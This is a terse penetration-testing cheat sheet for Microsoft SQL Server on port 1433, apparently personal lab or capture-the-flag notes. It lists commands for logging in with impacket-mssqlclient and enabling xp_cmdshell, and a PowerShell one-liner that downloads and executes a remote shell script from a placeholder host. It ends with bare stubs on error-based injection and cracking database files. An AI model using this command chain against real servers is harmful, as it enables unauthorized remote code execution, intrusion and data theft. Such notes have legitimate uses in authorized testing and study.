tcp/1433 mssql

> impacket-mssqlclient <user>:<pass>@<ip>
> enable_xp_cmdshell
> xp_cmdshell powershell.exe IEX (New-Object Net.WebClient).DownloadString(\"http://<ip>/shell.ps1\");

error-based injeciton

cracking mdf files